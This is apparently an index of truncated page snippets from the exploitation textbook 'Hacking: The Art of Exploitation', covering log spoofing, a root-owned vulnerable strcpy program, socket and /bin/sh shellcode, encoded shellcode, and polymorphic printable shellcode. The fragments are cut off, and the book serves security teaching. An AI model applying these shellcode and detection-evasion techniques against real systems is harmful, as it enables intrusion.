Hacking - The Art of Exploitation, 2nd Edition

Countermeasures 347 push edx ; Build arg array: { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF ...

348 0x600 0x660 Advanced Camouflage Our current stealth exploit only camouflages the web request; however, the IP address and ti ...

Countermeasures 349 This program can be used to inject a sockaddr_in structure. The output below shows the program being compile ...

350 0x600 (perl -e "print \"$FAKEREQUEST\""; ./addr_struct "$SPOOFIP" "$SPOOFPORT"; perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; ...

Countermeasures 351 Then, from another terminal, the new spoofing exploit is used to advance execution in the debugger. reader@h ...

352 0x600 sinzero = "\000\000\000\000 (gdb) x/s log_buffer 0xbffff1c0: "From 12.34.56.78:9090 \"GET / HTTP/1.1\"\t" (gdb) At the ...

Countermeasures 353 strace is used with the -p command-line argument to attach to a running process. The -e trace=write argument ...

354 0x600 (perl -e "print \"$FAKEREQUEST\""; ./addr_struct "$SPOOFIP" "$SPOOFPORT"; perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; ...

Countermeasures 355 big red flag. We could change the port to something that looks less suspicious; however, simply having a web ...

356 0x600 warning: not using untrusted file "/home/reader/.gdbinit" Using host libthread_db library "/lib/tls/i686/cmov/libthrea ...

Countermeasures 357 of new_sockfd will still be correct since the offset from ESP will be the same. As you may remember from deb ...

358 0x600 To effectively use this shellcode, we need another exploitation tool that lets us send the exploit buffer but keeps th ...

Countermeasures 359 00000020 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?.Iy..Rh//shh| 00000030 2f 62 69 6e 89 e3 52 89 e ...

360 0x600 The following shellcode pushes these encoded bytes to the stack and then decodes them in a loop. Also, two int3 instru ...

Countermeasures 361 push ebx ; push string addr to stack above null terminator. mov ecx, esp ; This is the argv array with strin ...

362 0x600 0xbffff738: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005' (gdb) cont Continuing. [tcsetpgrp failed in ...

Countermeasures 363 Since we zero out these registers before we use them, we can safely use a random combination of these bytes ...

364 0x600 strncpy(description, desc, MAX_DESC_LEN); strcpy(product_code, id); printf("Updating product #%s with description \'%s ...

Countermeasures 365 reader@hacking:~/booksrc $ gcc -o update_info update_info.c reader@hacking:~/booksrc $ sudo chown root ./upd ...

366 0x600 0x691 Polymorphic Printable ASCII Shellcode........................................... Polymorphic shellcode refers to ...